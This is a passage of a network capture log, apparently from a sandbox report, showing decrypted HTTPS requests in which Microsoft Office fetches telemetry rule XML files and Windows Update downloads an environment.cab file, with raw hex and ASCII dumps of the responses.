                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:45 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010045Z-1746fd949bd9x4mhhC1EWRb76n00000000e00000000021e3
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    98192.168.2.64980513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:45 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1360
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010045Z-1746fd949bddgsvjhC1EWRum2c00000000pg00000000mga2
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    99192.168.2.64980313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:45 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1364
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010045Z-1746fd949bdmv56chC1EWRypnn00000000m000000000az61
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                    100192.168.2.6498064.175.87.197443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DbN5n5YUtSNy7o2&MD=zyr2r5xC HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                                                                    MS-CorrelationId: 32a3d2a9-b11e-4520-a9a9-a8e4d7b4cd66
                                                                                                                                                                                                                                                                                                    MS-RequestId: 1a25b70e-4476-4dcc-8876-1033d02a7d3c
                                                                                                                                                                                                                                                                                                    MS-CV: 3zBIduSH7kK5Q+ey.0
                                                                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:45 GMT
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Content-Length: 30005
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    101192.168.2.64980713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:46 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e40b0455-101e-008e-19d2-45cf88000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010046Z-1746fd949bdkw94lhC1EWRxuz400000000mg00000000bfrt
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    102192.168.2.64980813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:46 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:47 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:47 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010047Z-174f7845968j6t2phC1EWRcfe800000016xg0000000069mn
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:47 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    103192.168.2.64980913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:47 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:47 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1397
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 709a1193-501e-00a3-3559-43c0f2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010047Z-174f7845968jrjrxhC1EWRmmrs00000016v000000000avh7
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    104192.168.2.64981013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:47 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:47 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1360
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010047Z-1746fd949bdjrnwqhC1EWRpg2800000000g00000000044qb
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    105192.168.2.64981113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:47 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:48 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1427
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
